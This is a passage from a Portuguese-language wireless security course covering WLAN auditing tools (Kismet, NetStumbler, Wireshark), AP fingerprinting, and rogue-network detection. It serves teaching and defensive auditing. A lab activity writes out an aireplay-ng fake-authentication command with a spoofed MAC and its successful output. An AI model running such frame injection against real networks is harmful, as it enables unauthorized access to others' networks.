política estiver implantada; 11 Mapear abrangência da rede: mapear a abrangência da rede, atividade também conhe cida como site survey, possui dois objetivos básicos: conhecer a distribuição de canais na área de abrangência da organização e conhecer a abrangência da rede; 11 Avaliar o grau de divulgação de informações da organização: avaliar a presença de redes “rogue” na organização que usam mecanismos de segurança fracos (WEP ou WPA com chave fraca) ou mesmo nenhum mecanismo. Redes que permitem o acesso não autorizado, captura e deciframento de tráfego permitem também que informações da organização sejam divulgadas.

68

Fingerprinting do AP
Passivo: 11 Não há necessidade de estar conectado à rede. 11 Identificar o fabricante: 22 Organization Unique Identifier (OUI) da interface de rede. 22 Alocado pelo IEEE. 22 Útil apenas em tráfego unicast e broadcast. 11 Identificar informações proprietárias divulgadas nos quadros beacon. Ativo: 11 Necessidade de conexão. 11 Conectar-se ao AP remotamente (SSH e servidor web).

q

Fingerprinting passivo

w
A lista de prefixos disponíveis está em “IEEE OUI and Company_id Assignments (Pesquisa)” e “IEEE OUI and Company_id Assignments”: http:// standards.ieee.org/ regauth/oui/oui.txt

O fingerprinting passivo do Access Point pode ser feito a partir do tráfego de gerenciamento e controle coletado. Conforme tratado no Capítulo 3, para a coleta desse tipo de dado é necessário que o driver da interface de rede permita o modo “monitor” (RFMON). Mais adiante, veremos que os endereços MAC podem revelar informações mais interessantes quando o tráfego é multicast. O endereço MAC possui 6 bytes (48 bits), normalmente separados por hífen (-) ou por dois pontos (:) e expressos em base hexadecimal. Os três primeiros são únicos por fabricante e alocados pelo IEEE. Utilitários como NMAP e Wireshark fazem uso dessa lista para identificar o fabricante da interface de rede. Outra fonte de informações que pode ser obtida passivamente está nos quadros de gerenciamento, mais especificamente nos beacons. Interfaces da Broadcom, presentes em APs Linksys, incluem “tagged tags” específicos nos quadros de gerenciamento. Outra maneira de identificar a marca é a maneira como SSIDs ocultos aparecem, ou seja, com nenhum valor (Linksys), 6 ou mais bytes nulos (0x00 – Cisco), ou como um espaço (0x20 – Enterasys).

Fingerprinting ativo
A identificação ativa, diferentemente da passiva, envolve conexão no AP para obter texto com informações e versões do equipamento (banner). Sua grande desvantagem está na
Capítulo 4 - Auditoria em redes sem fio (parte 2)

detecção da auditoria no momento da conexão do auditor. Como veremos adiante, ferramentas de auditoria também podem ser ativas. NetStumbler identifica redes de maneira ativa e não é indicado caso o auditor deseje conduzir uma audi toria “silenciosa” aos administradores da rede.

Processamento de informações coletadas
11 Gerar planilhas com arquivos XML e CSV gerados pelo Kismet. 11 Identificar redes com segurança fraca. 11 Informações úteis. 11 SSIDs usados, marcas de interfaces, potência do sinal e nível de ruído, entre outros indicadores.

q

69

Processar os dados gerados por ferramentas de auditoria como Kismet e NetStumbler é uma boa opção para a geração de gráficos de nível gerencial. A partir de arquivos em formato XML (Extensible Markup Language) e CSV (Comma-Separated Values), é possível gerar gráficos com informações importantes para quem implementou ou vai implementar uma WLAN: 11 Incidência de “rogue” APs; 11 Distribuição de canais; 11 Distribuição de mecanismos de segurança; 11 Número de clientes por AP, entre outros.

Identificação de métodos de segurança
Automaticamente: 11 Ferramentas como Kismet. Manualmente: 11 Captura e filtro de quadros não interessantes. 22 Beacon. 22 Probe request. 22 Probe response. 11 Análise com analisadores de tráfego como Wireshark.

q

A ferramenta Kismet, que utilizaremos na prática, é capaz de identificar vários métodos de segurança. WEP é identificado explicitamente pelo parâmetro “WEP”: 11 Yes : indica um Basic Service Set (BSS) com WEP; 11 No: indica um BSS sem WEP; 11 Other: indica um BSS com um mecanismo diferente de WEP. Kismet é capaz de identificar vários mecanismos de autenticação 802.1x: 11 EAP-TLS; 11 LEAP; 11 PEAP. Convém lembrar que a ferramenta precisa capturar certa quantidade de quadros para caracterizar um BSS. Kismet também pode identificar redes que cifram os dados mas não marcam a flag WEP nos quadros. Isto pode ser feito com a habilitação da opção “fuzzycrypt”. A análise manual será tratada com uso da ferramenta Wireshark nas atividades práticas deste capítulo.
Segurança em Redes sem Fio

w
Mais informações em “Kismet Readme Configuration”: http://www.kismetwire less.net/documenta tion.shtml#readme

Mapeamento externo
11 Mapear alcance da rede. 11 Útil para identificar a provável área de ataque. 11 Não leva em consideração atacante melhor equipado. 22 Antena de alto ganho. 11 Latitude e longitude de cada pacote. 22 Receptor GPS.

q

70

Um dos aspectos mais interessantes do mapeamento externo é a possibilidade de mapear o alcance das redes com o uso de coordenadas de latitude e longitude. Esse tipo de
GPS Sistema de navegação por satélite que fornece a um aparelho móvel sua posição, assim como informação horária, sob todas condições atmosféricas, a qualquer momento e em qualquer lugar na Terra, desde que o receptor se encontre no campo de visão de quatro satélites GPS.

auditoria é possível com o auxílio de um receptor Global Positioning System (GPS ) que, associado ao software de auditoria, informa as coordenadas geográficas de cada pacote recebido. Tanto Kismet quanto NetStumbler permitem a associação com um receptor GPS para geração de mapas. É conveniente lembrar que um atacante equipado com uma interface com boa sensi bilidade e antenas de alto ganho pode mapear redes a partir de pontos distantes do centro da rede (localização do AP).

Mapeamento interno
Pode ser associado com mapas internos da organização. GPS não é possível. 11 Necessidade de visada do céu para recepção dos sinais dos satélites. Conectividade depende da qualidade do sinal. 11 Signal to Noise Ratio (SNR). 11 Mínimo entre ~4 dB (conexão a baixa velocidade) e 20 dB. O mapeamento do ambiente interno de uma organização não pode ser associado a um receptor GPS, uma vez que é necessária a visada dos satélites para a determinação das coordenadas. Para mapear espaços internos usam-se ferramentas de software proprietá rias que tenham como entrada um blueprint (mapa esquemático) da área construída.

q

O auditor indica no software em que ponto do mapa está para que o software seja capaz de determinar a escala e as distâncias envolvidas. Alguns equipamentos profissionais para redes sem fio disponibilizam softwares com capacidade de gerenciar o nível do sinal do
Figura 4.1 Tela de captura do AirWave.

ambiente interno. Essa informação, associada a uma planta baixa do ambiente, provê a visualização da cobertura Wi-Fi no local. Um exemplo de software com essa capacidade é o AirWave (Aruba Networks: www.arubanetworks.com).

Capítulo 4 - Auditoria em redes sem fio (parte 2)

71

O mapeamento interno é importante na avaliação da necessidade de novos APs – clientes normalmente exigem um nível de SNR (Signal to Noise Ratio) mínimo de 4 dB para associação.

Avaliação do tráfego
Tráfego não cifrado. 11 Quadros de dados são cifrados em redes com segurança ativa. 11 WEP e WPA (TKIP) podem ser decifrados. 22 Kismet – WEP decifrado em tempo real. 11 Ferramentas de análise de tráfego Ethernet são aplicáveis. 22 Wireshark, Snort e TCPdump. 11 Divulgação de informações. 22 Análise de tráfego capturado em formato PCAP com utilitários strings e display filter Wireshark. É possível avaliar o nível de informações da organização que são divulgadas pela análise do tráfego da rede. Isso pode ser feito por intermédio de analisadores de pacotes, como Wireshark, Snort e TCPdump.

q

Convém lembrar que, numa rede com um mecanismo de segurança implantado, os quadros 802.11 de dados são cifrados. Assim, só é possível analisá-los depois de decifrados. Hoje, os únicos mecanismos de segurança que permitem que se decifre tráfego previamente capturado são WEP e WPA (TKIP). Kismet permite que o tráfego WEP seja decifrado em tempo real, uma vez que a chave seja conhecida. Ferramentas como strings (úteis para identificar cadeias de texto dentro de arquivos binários, como o de captura) e Wireshark são úteis para a identificação do tipo de informações divulgadas pela rede.

Avaliação de tráfego cifrado
Cabeçalho 802.2 (LLC) marca o início do payload, portanto cifrado. Kismet: 11 Identifica tráfego cifrado na ausência dos bytes 0xAA 0xAA, que caracterizam o cabeçalho LLC. 11 Fuzzy Encryption Detection (configuração fuzzycrypt ). 11 Flag WEP não é o único indicador. WEP: 11 É possível decifrar sem a chave, em alguns casos.

q

Hoje, muitos administradores de rede já implementam mecanismos de segurança, por isso
Segurança em Redes sem Fio

é bem provável que você, como auditor, não encontre redes abertas, sem algum mecanismo de segurança. Assim, a ferramenta de auditoria deve ser capaz de identificar adequada mente as redes com mecanismo de segurança. A presença da flag WEP nos quadros não é o único indicador com mecanismo de segurança ativado. Kismet é capaz de identificar redes com segurança por meio dos principais indica dores. Por exemplo: 11 Quadros de dados são cifrados. Assim, se não existem os bytes “0xAA 0xAA”, que caracterizam o cabeçalho LLC em um quadro de dados, o quadro passou por algum tipo de proteção, possivelmente por um mecanismo de segurança;

72

11 Quadros de dados cifrados deveriam, por padrão, ter a flag WEP marcada, mas isso nem sempre acontece. A opção “netfuzzycrypt” faz com que Kismet tente detectar redes com segurança; 11 É possível, ainda, decifrar tráfego WEP em alguns casos, como veremos adiante.

Análise da camada MAC

w
Saiba mais em “IPv4 Multicast Address Space Registry” e “Ethernet Number” no site http://www.iana.org

Sempre trafega em claro (não cifrada). Endereço multicast de destino revela pistas sobre protocolo usado. 11 01-00-5E-00-00-00 a 01-00-5E-7F-FF-FF alocado pela IANA para Multicast Internet. 11 01-00-5E-00-00-05 = 224.0.0.5.

q

Outra maneira de se analisar tráfego cifrado é por meio da análise dos endereços da camada MAC. A presença do endereço de destino multicast pode revelar pistas sobre o protocolo usado, de acordo com intervalos determinados pela IANA.

Avaliação de tráfego cifrado
Histograma dos quadros: 11 Analisa a frequência de um byte no intervalo capturado. 11 Selecionar apenas quadros de dados (payload cifrado). 11 PCAPHistogram. 22 Ferramenta desenvolvida por Joshua Wright, do SANS Institute. É possível que uma empresa adote um mecanismo de segurança próprio para cifrar os pacotes. Mas como realizar essa detecção? É possível determinar se um tráfego é cifrado ou não pela análise da ocorrência de carac-

q

teres em um tráfego. O tráfego cifrado possui, como características básicas, a aleatoriedade e a não repetição de caracteres. A ferramenta PCAPHistogram, desenvolvida por Joshua Wright (SANS Institute) indica, por meio de gráficos, a frequência de bytes – pontos bem distribuídos no gráfico indicam tráfego possivelmente cifrado, enquanto que pontos pouco distribuídos indicam tráfego possivelmente aberto.

Exercício de fixação 1 e Metodologias de auditoria
Quais as principais diferenças entre fingerprinting passivo e o fingerprinting ativo?
Capítulo 4 - Auditoria em redes sem fio (parte 2)

Ferramentas de auditoria
Principais ferramentas de auditoria: 11 TCPdump. 11 Airodump-ng. 11 Wireshark. 11 NetStumbler (Windows).

q

73

11 Kismet. 22 Linux apenas, versão Windows em desenvolvimento. 11 Outras ferramentas. 22 Auditorias específicas de mecanismos de segurança, como WEP, WPA, entre outras. Algumas ferramentas foram e serão muito mencionadas no decorrer deste curso, e a principal delas é o Kismet, que agrega diversas funcionalidades em uma única ferramenta

q

de auditoria. NetStumbler, embora seja bem limitado em funcionalidades se comparado ao Kismet, é uma boa opção para auditorias baseadas em Windows. Outras ferramentas genéricas de análise também são usadas: 11 TCPdump: tradicional analisador de pacotes baseado em texto. Suas diversas opções de filtros e exibição podem ajudar em algumas análises. 11 Airodump-NG: ferramenta Linux para captura específica de tráfego 802.11, parte do pacote AIRCRACK-NG. 11 Wireshark : considerado a versão gráfica de TCPdump, oferece diversas funcionalidades de exibição, filtro e captura de tráfego. Possui o diferencial de permitir o deciframento de tráfego WEP, uma vez que seja fornecida a chave. No decorrer deste curso, serão apresentadas outras ferramentas para cenários específicos, como mecanismos de segurança WEP e WPA.

Wireshark
11 Poderoso analisador de tráfego que possui uma interface de visualização de pacotes mais amigável que a do comando TCPdump. 11 Estrutura em árvore, resolução de hostname/porta/MAC, possibilidade de visuali zação de fluxos. 11 Dependente da biblioteca Libpcap ou Winpcap, captura tráfego e abre arquivos de captura PCAP. 11 Interoperabilidade com TCPdump, Airodump-ng, Kismet e outras ferramentas. 11 Filtros de captura no mesmo formato usado por TCPdump, filtros de exibição. Wireshark (antigo Ethereal até 2006) é uma ferramenta tradicional de análise de tráfego que também é de grande utilidade para WLAN. É capaz de lidar com arquivos PCAP, possui

q

formato compatível com diversas outras ferramentas como TCPdump e revela mais informa ções do que esta última ferramenta, por apresentar os dados na forma de árvore, decodi ficar tráfegos conhecidos, entre outros recursos. Convém lembrar que, com a interface em modo “managed”, qualquer ferramenta será capaz de capturar apenas tráfego 802.3 (Ethernet aparente). Para capturar tráfego 802.11 + 802.2
Segurança em Redes sem Fio

(LLC), é necessário que a interface esteja em modo “monitor” ou RFMON, o que, atualmente, é possível apenas com os drivers Linux. Wireshark conta com um utilitário de linha de comando, o twireshark. Abordaremos mais detalhes de ambas as versões na prática deste capítulo.

74

Figura 4.2 Tela do Wireshark.

Wireshark permite a visualização dos pacotes de maneira hierárquica, camada a camada. Esse tipo de visualização, aliado a recursos de agrupamento de fluxos e decodificação – inclusive de tráfego WEP, desde que se conheça a chave – são diferenciais dessa ferramenta que a tornaram líder. Convém lembrar que Wireshark depende da biblioteca de captura de pacotes Libpcap ou Winpcap. Sob a plataforma Windows, o instalador já inclui a última versão de Winpcap.

Para pensar
É conveniente lembrar que Wireshark não é uma ferramenta apropriada para análise de arquivos capturados excessivamente grandes, devido aos recursos de hardware exigidos. Para a análise de arquivos de captura grandes, é possível dividir o arquivo de captura original em outros menores (a ferramenta Editcap é parte do pacote) ou mesmo usar uma ferramenta que exige menos recursos de hardware,
Capítulo 4 - Auditoria em redes sem fio (parte 2)

como TCPdump ou tshark.

Kismet
11 Diversas funções como Wardriving, site survey, IDS distribuído, auditoria, detecção de APs “rogue” e detecção de IVs duplicados em redes com WEP. 11 Interação com GPS para mapeamento. 11 Driver próprio, mais de 20 tipos de NIC suportados. 11 Suporte ainda limitado aos principais chipsets. 11 Restrito a Unix, com diversas dependências. 22 GPSD, ImageMagick, Expat e GMP. 11 Possibilita a captura em todos os canais simultaneamente.

q

75

Kismet é a ferramenta livre que oferece mais recursos ao auditor. Além de exibir informa ções sobre as redes em um nível de detalhes maior do que ferramentas como NetStumbler e Kismet, tem um diferencial essencial: audita redes com a interface em modo “monitor”, ou seja, não envia pacotes de probe como NetStumbler e outras. A auditoria em modo “managed”, o mesmo usado na associação, é “barulhenta” e permite que se detecte a pre sença de um cliente através de investigação na área. Kismet oferece a possibilidade de captura associada com um receptor GPS, o que permite a geração posterior de mapas, como o NetStumbler. Outra característica interessante de Kismet é a possibilidade de gerar dados da auditoria em diversos formatos, o que permite a visualização tanto por ferramentas simples (como Excel) quanto por utilitários que geram mapas mais complexos dos dados gerados. Uma característica interessante de Kismet é a possibilidade de usá-lo como ferramenta de IDS wireless por meio do recurso de drones. Com isso, é possível instalar sensores Kismet que reportam a um servidor central, possibilitando a captura em diversos pontos da organização. Finalmente, Kismet permite a captura de todos os canais simultaneamente (inclusive o canal 14), através da utilização de sensores drone ou de diversas interfaces de rede. A interface gráfica de Kismet é simples, mas conta com diversos filtros e métodos de orde nação. Algumas funcionalidades: 11 Filtros por BSSID, SSID, contagem de pacotes, potência do sinal e presença de WEP; 11 Possibilidade de agrupar redes; 11 Visualização de estatísticas, conteúdo dos pacotes em tempo real (dump): útil para análise de divulgação de informações sensíveis em uma rede sem fio desprovida de mecanismos de segurança; 11 Estatísticas; 11 Informações detalhadas sobre as redes, possibilidade de visualizar clientes associados a um determinado ESS.

NetStumbler
11 Ferramenta mais popular, restrita ao Windows, com diversas funções: 11 Configuração da sua rede, detecção de interferência, APs não autorizados (rogue), wardriving (suporte a GPS). 11 Auditoria ativa, detectável por probes. 11 Limitado, se comparado ao Kismet. 11 RFMON ausente sob Windows. 11 Bom suporte a NICs em Windows.
Segurança em Redes sem Fio

q

w
Veja a lista de compatibilidade do NetStumbler: http:// www.stumbler.net/ compat/ e uma página com comparação de hardware: http://www. seattlewireless.net/ HardwareComparison

11 “Barulhento”. O suporte a NetStumbler é bom, pois dificilmente se encontra uma interface não suportada. A interface opera em modo “managed”, como um cliente da WLAN. Enquanto a ferramenta é utilizada, não é possível a associação a um AP. A ferramenta interrompe o serviço Wireless Zero Configuration (WZCSVC) durante sua execução, caso não sejam utilizados drivers proprietários da NIC.

76

Ao contrário do Kismet, o NetStumbler é “barulhento”: a identificação de redes ocorre pelo envio de probes com a interface em modo “managed”. Isso torna o cliente que realiza a
Figura 4.3 Tela do NetStumbler.

auditoria visível para um administrador que use Kismet para detectar atacantes. Kismet, por sua vez, não transmite um único pacote em suas auditorias, porque configura a interface de rede para modo “monitor”, capaz de capturar dados de qualquer rede em um dado canal.

GPSMAP
11 Utilitário que integra o pacote Kismet. 11 Diversos tipos de mapa. 11 Abrangência, potência, área de cobertura estimada, entre outros. 11 Permite filtros, útil para ocultar redes irrelevantes. 11 Estima o centro da rede.

q

Um dos aspectos mais interessantes de Kismet é a possibilidade de gerar gráficos da área de abrangência de cada AP. Isso é possível com o uso de um receptor GPS compatível durante a auditoria, que marca cada pacote com dados de latitude e longitude no instante da hoje é de pouca utilidade para auditorias no Brasil, porque os sites usados como fonte de mapas não possuem boa cobertura. Existem ferramentas que permitem visualizações mais modernas de mapas, como o Google Earth.
Capítulo 4 - Auditoria em redes sem fio (parte 2)

captura. O próprio Kismet oferece uma ferramenta para a geração de gráficos, GPSMAP, mas

77

O mapa anterior foi gerado a partir do utilitário GPSMAP de Kismet, durante uma auditoria feita no centro de Los Angeles. As cores exibidas indicam o nível de segurança da rede: verde para redes seguras e vermelho para inseguras.

Figura 4.4 Mapa feito com o utilitário GPSMAP do Kismet. Centro de Los Angeles, outubro de 2005.

78

Segurança em Redes sem Fio

Roteiro de Atividades 4
Atividade 4.1 – NetStumbler no Windows e suas funcionalidades
Nesta atividade, executaremos o NetStumbler e vamos nos familiarizar com a sua interface e os seus comandos. Execute o NetStumbler no Windows por meio do menu “Iniciar”. Verifique as funções do NetStumbler: configuração da sua rede, detecção de interferência, APs não autorizados, suporte a GPS, filtros, entre outras. Relembrando, o NetStumbler pode ser utilizado para: 11 Verificar se a configuração de sua rede está de acordo com o planejado; 11 Localizar locais com falhas de cobertura em suas WLANs; 11 Detectar outras WLAN que podem estar causando interferência em sua rede; 11 Detectar “rogue” AP em seu local de trabalho; 11 Auxiliar o posicionamento de antenas direcionais em links WLAN; 11 Uso em Wardriving (limitado). Utilize as funcionalidades do NetStumbler que foram apresentadas pelo instrutor e procure entender o seu funcionamento.

Atividade 4.2 – Kismet no Linux e suas funcionalidades
Nesta atividade, executaremos o Kismet e vamos nos familiarizar com a sua interface e os seus comandos. Kismet é um analisador de redes sem fio do padrão IEEE 802.11 (camada 2), sniffer e Intrusion Detection System (IDS). O Kismet pode ser usado com qualquer interface de rede sem fio que suporte o modo monitor (RFMON), podendo capturar, passivamente, os tráfegos 802.11a, b ou g. Execute o Kismet por intermédio da linha de comando ou através das opções de aplica tivos do BackTrack 5 (“Backtrack” > “Information Gathering” > “Network Analysis” > “WLAN Analysis” > “kismet”). Para executar na linha de comando, utilize:

# kismet
Observe a tela inicial de captura do Kismet. Nela, é possível visualizar as redes que foram detectadas passivamente (modo monitor) pela placa de rede wireless, além do canal que cada rede usa, o tipo de rede (A, B ou G) e também se existe segurança habilitada, entre outras informações. A interface do Kismet possui três áreas distintas. A central e maior delas contém as informações sobre as redes detectadas. A da direita possui informações estatísticas gerais, o(s) driver(s) da(s) placa(s) que monitora e os canais que estão sendo monitorados. A inferior possui os alertas e eventos que ocorrem em tempo real, tais como: detecção de uma nova rede, alerta do IDS, salvamento dos dados etc. Tecle “h” e visualizaremos as opções do Kismet e as informações gerais sobre a interface e suas opções (T, A, P, H, W, Y, N e Ch).
Capítulo 4 - Roteiro de Atividades

79

Opções List Kismet servers Toggle fullscreen zoom on network view Toggle muting of sound and speech Tag (or untag) selected network Group tagged networks Ungroup current group Show clients in current network Lock channel hopping to current channel Return to normal channel hopping Expand or collapse groups Force a screen redraw Help Name current network Detailed info about current network Sort network list Show wireless card power levels Dump printable strings Packet rate graph Statistics Dump packet type Follow network centre Track alerts Close popup window Quit Abaixo da opção “T”, as seguintes opções estão disponíveis: Código P
Segurança em Redes sem Fio

Tecla e z m t g u c L H +/^L h n i s l d r a p f w x Q

Tipos de Redes ou Clientes Probe request – no associated connection yet Access point – standard wireless network Ad-hoc – point to point wireless network Turbocell – Turbocell aka Karlnet or Lucent Router Group – Group of wireless networks Data – Data only network with no control packets

A H T G D

80

Abaixo da opção “W” as seguintes opções estão disponíveis: Código N Y O Tipo de Criptografia No encryption in use WEP encryption on use Other encryption in use (por exemplo: LEAP e WPA)

Tecle “s” e selecione de que forma desejamos que as redes sejam apresentadas na interface gráfica. Escolha por: Channel First time seen Latest time seen SSID Packet count Signal power level WEP tecla c f l s p Q w

As cores apresentadas na interface gráfica, para as redes descobertas, possuem o seguinte significado: Cor Amarelo Vermelho Verde Azul Tipo de Rede ou Cliente Unencrypted Network Factory default settings in use Secure Networks (WEP, WPA etc.) SSID cloaking on/Broadcast SSID disabled

Selecione uma das redes e tecle “i” para informações detalhadas sobre a rede selecionada. A tecla “L” (lock) força o Kismet a monitorar apenas um canal selecionado de determinada rede, o que aumenta a o número de pacotes capturados naquele canal específico. A tecla “H” retorna para o salto entre canais, ou seja, todos os canais são varridos em sequência. O Kismet, conforme captura o tráfego 802.11, salva as informações das redes, clientes e quadros obtidos em diversos formatos:
Capítulo 4 - Roteiro de Atividades

11 .dump: todo o tráfego capturado no formato libcap; 11 .network : resumo em formato texto das informações das redes e clientes observados; 11 .xml: arquivo em formato XML; 11 .csv : informações observadas, separadas por “;”, para aplicações de banco de dados; 11 .gps: coordenadas GPS para a captura do Kismet para uso do GPSMAP; 11 .cisco: arquivo txt com informações de CDP (Cisco Data Protocol); 11 .weak : arquivo em formato libpcap contendo pacotes WEP que podem ser analisados pelo Airsnort.

81

Verifique a captura do arquivo .dump, copiado para o pendrive ou partição pelo aplicativo Wireshark, conforme a prática anterior. Utilize as funcionalidades do Kismet que foram apresentadas pelo instrutor e procure entender o seu funcionamento. Outras opções de execução podem ser realizadas. Verifique-as através do comando:

# man kismet

Atividade 4.3 – Demonstração de injeção de tráfego na rede
Nesta atividade utilizaremos o Wireshark para demonstrar uma injeção de tráfego na rede. Em uma auditoria, essa atividade pode demonstrar a capacidade de se injetar tráfego em uma rede sem fio. Exploraremos a rede sem fio do laboratório (SSID: ESR-SEG6, Canal: 8). Configurar a interface em modo monitor no canal 8:

# airmon-ng start wlan0 8 Interface Chipset Driver

wlan0

Ralink 2573 USB

rt73usb - [phy0]

(monitor mode enabled on mon0)
Iniciar o Wireshark para visualizar a injeção de tráfego. Utilizaremos a interface mon0 para captura, como podemos ver na figura a seguir:
Figura 4.5 Identificando a interface.

82

Segurança em Redes sem Fio

Realizar uma injeção de uma tentativa de autenticação utilizando um endereço MAC fictício (00:11:22:33:44:55) em uma rede aberta. Essa injeção será realizada com o comando aireplay-ng :

# aireplay-ng -1 10 –e ESR-SEG6 –a 00:18:39:C8:B5:4A –h 00:11:22:33:44:55 mon0 00:11:22:33:44:55 mon0

The interface MAC (00:1E:E5:FF:84:2A) doesn’t match the specified MAC (-h). ifconfig mon0 hw ether 00:11:22:33:44:55 21:27:12 channel 8 Waiting for beacon frame (BSSID: 00:18:39:C8:B5:4A) on

21:27:12 21:27:12 21:27:12 21:27:12

Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1)

Aqui podemos visualizar, pelo log do aireplay-ng, que a associação forjada foi bem-sucedida. Opções do comando aireplay-ng : 11 -1: opção para ataque do tipo “fakeauth” (uma tentativa de autenticação ao AP); 11 10: quantidade de tentativas de autenticação realizadas; 11 -e SSID: especifica o SSID da rede explorada; 11 -a MAC: especifica o endereço MAC (BSSID) do AP explorado; 11 -h MAC: especifica o endereço MAC do cliente que forjará a autenticação 11 mon0: interface utilizada para injeção de pacotes. Visualizar na tela no Wireshark o sucesso da autenticação e o endereço MAC forjado:

Capítulo 4 - Roteiro de Atividades

83

Figura 4.6 Visualizando o resultado.

84

Segurança em Redes sem Fio

5
Redes rogue e ataques DoS
objetivos
Apresentar ameaças inerentes a redes sem fio antes de ataques aos dispositivos de segurança e o conceito de redes sem fio não autorizadas (redes rogue); mostrar o risco constante de ataques de negação de serviço (DoS) e maneiras de proteger a rede contra tais riscos.

conceitos

Redes rogue Fingerprinting do AP e ataques de negação de serviço em redes 802.11s.

Introdução
11 Rede rogue é qualquer Wireless Access Point (WAP) instalado sem a permissão do administrador de rede. 11 Denial of Service (DoS): ocorre quando o cliente é incapaz de manter associação com um AP. Neste capítulo, abordaremos duas ameaças constantes às redes wireless: redes rogue e

q

ataques de negação de serviço, estes últimos mais conhecidos por sua sigla em inglês, DoS (Denial of Service). Na primeira parte do capítulo, abordaremos algumas técnicas de identificação de dispositivos rogue, com foco na localização do transmissor e na correlação entre a rede sem fio e a rede cabeada à qual ela está conectada por intermédio do Access Point. Na segunda parte do capítulo, abordaremos ataques DoS contra redes sem fio, bem como algumas medidas de defesa contra esse tipo de ataque. Esse tipo de ataque é inerente à especificação 802.11, que permite que sejam forjados pacotes de desassociação e desauten ticação, com o intuito de forçar um cliente ou um AP a terminar a associação.
Capítulo 5 - Redes rogue e ataques DoS

Exercício de nivelamento 1 e Redes rogue
O que são redes rogue?

85

Problemas agravantes
11 WAP instalado com a permissão do administrador, mas indevidamente configurado. 11 Permite acesso à rede interna cabeada. 11 Perda do controle do perímetro da rede.

q

Não há perímetro quando se fala em redes sem fio. Redes rogue normalmente são definidas como redes não autorizadas. Entretanto, muitas vezes o Access Point possui autorização dos administradores de rede para operar, mas não é devidamente configurado. A instalação desse tipo de dispositivo invalida qualquer tentativa de delimitação do perímetro da rede, uma vez que: 11 A rede não permite o controle do acesso ao meio de transmissão, como nas redes cabeadas; 11 Sem os filtros de firewall definidos pela política da empresa e por mecanismos de segu rança, esse elemento da rede abre uma brecha no perímetro – um perímetro aberto não é um perímetro.

Tipos de rogue
11 Amigável. 11 Malicioso. 11 Não intencional. Existem, basicamente, três tipos de ameaças rogue: 11 Rogue amigável: tipicamente instalado por um usuário que instala um AP SOHO (Small Office/Home Office) ou configura sua estação como AP, sem a devida preocupação com segurança. Envolve a infração da política de segurança por um usuário; 11 Rogue malicioso: instalado com a intenção de criar uma “porta dos fundos” (backdoor) em sua rede, de forma que o atacante tenha livre acesso a ela;

q

11 Rogues não intencionais: diferentemente dos amigáveis, são autorizados. A diferença está na implantação, que ocorre sem considerar a política de segurança para dispositivos sem fio. É o tipo mais comum, já que as organizações normalmente não monitoram suas redes sem fio.

Técnicas de identificação de rogues
A partir da rede cabeada: 11 Fingerprinting do AP. 11 Análise do prefixo do MAC. A partir da rede sem fio:
Segurança em Redes sem Fio

q

11 Warwalking. 11 Monitoração dos clientes. 11 Implantação de IDS na WLAN. Uma vez conceituado o risco das redes rogues e descritos os tipos mais comuns, examina remos diferentes técnicas de identificação de rogues. A seguir, apresentamos as técnicas de análise em duas frentes: 11 Análise a partir da rede cabeada; 11 Análise a partir da rede sem fio.

86

Rede cabeada: Fingerprinting do AP
11 Ferramentas de varredura de vulnerabilidades. 11 Analisa o lado do AP que toca a LAN. 11 Depende de assinaturas. 11 Nessus. 22 Plugin #11026 (Access Point Detection).

q

A primeira técnica de análise a partir da rede cabeada é o uso de ferramentas de varredura de vulnerabilidades para identificar APs que já tiveram seu perfil previamente traçado. Quando falamos do perfil de um dispositivo de rede, nos referimos a características únicas ou agrupadas que o identificam com um certo grau de precisão. Nessus, um popular sistema de varredura de vulnerabilidades para Linux, conta com o plugin #11026 (find_ap.nasl Access Point Detection) para a identificação da presença de um WAP na rede, que se utiliza de quatro técnicas:5 11 TCP/IP Fingerprinting NMAP: técnica baseada na determinação do Sistema Operacional do sistema remoto, com base nas respostas a pacotes TCP/IP. Alguns Sistemas Operacio nais se comportam diferentemente do que é definido pelas Request for Comments (RFC, documento do IETF) no que diz respeito a TCP/IP, comportamento anômalo que permite identificar o sistema de maneira única. O que ferramentas como NMAP e Nessus fazem é procurar, na base de assinaturas já conhecidas, por uma entrada que coincida com a assinatura do dispositivo que está sendo avaliado. Para utilizar essa técnica, é necessário que pelo menos uma porta seja alcançável pelo Nessus: 11 HTTP Fingerprinting: praticamente todo WAP conta com uma interface administrativa web. Uma vez que o servidor web embarcado normalmente é proprietário, procura-se por cadeias de texto no banner (tela inicial) que o identifiquem de maneira única: uma assinatura; 11 FTP Fingerprinting : da mesma maneira utilizada com os servidores web embarcados, é possível identificar um determinado WAP pelo texto inicial que o servidor FTP – normal mente usado para atualização de firmware – apresenta; 11 Consultas SNMP: se a porta SNMP estiver aberta e a community string (que tem a função de uma senha) for conhecida, esse plugin do Nessus tenta consultar o valor “sysDesc”. Nessus, que antes era open source em todo o sentido da expressão, adotou em 2004 um novo sistema de licenças, visando controlar o uso de sua ferramenta por empresas. Para ter acesso aos plugins tão logo sejam lançados, é necessária a aquisição de uma licença.

w
Leia “Wireless Access Point Detection” em http://www.tenable.com

Rede cabeada: análise do prefixo MAC
Empresas alocam endereços MAC em blocos: 11 Possibilidade de identificar produtos. 11 Possibilidade de procurar silenciosamente por rogues. 11 Escuta de tráfego ARP.

q

Capítulo 5 - Redes rogue e ataques DoS

87

CPU
OpenWrt br0

WRT54G v4 WRT54GS v3

eth1
vlan0 vlan1

eth

WIFI Access Point

Tagging

eth0

Porta interna

WAN port

Portas LAN 1 2 3 4

Internet

Case Labels
Números de portas VLAN

5
Tagging

4
vlan1

3

2

1

0

vlan0

Switch

Figura 5.1 Arquitetura interna do AP WRT54GS (v3), da Linksys.

Identificar a interface de rede pelos primeiros 24 bits do endereço MAC da interface – Organizationally Unique Identifier (OUI), obtido com a IEEE – também é relevante para a identificação de um AP na rede. A arquitetura interna da maioria dos APs é composta de bridges e VLANs, como se pode observar pela arquitetura interna do AP WRT54GS (v3), da Linksys. Externamente, há a interface de rede sem fio operando em modo Master, que confere ao AP sua função principal, uma interface de rede para conexão com a rede de distribuição (a rede cabeada) e, por final, conexões para a ligação de estações por rede cabeada convencional. A interface que toca a LAN permite que se faça esse tipo de análise.

w
Pesquise “IEEE OUI and Company_id Assignments” no site http:// standards.ieee.org/

Warwalking
11 Uso de ferramentas de wardriving. 11 Etapas: 22 Determinar o que já existe em termos de redes sem fio.
Segurança em Redes sem Fio

q

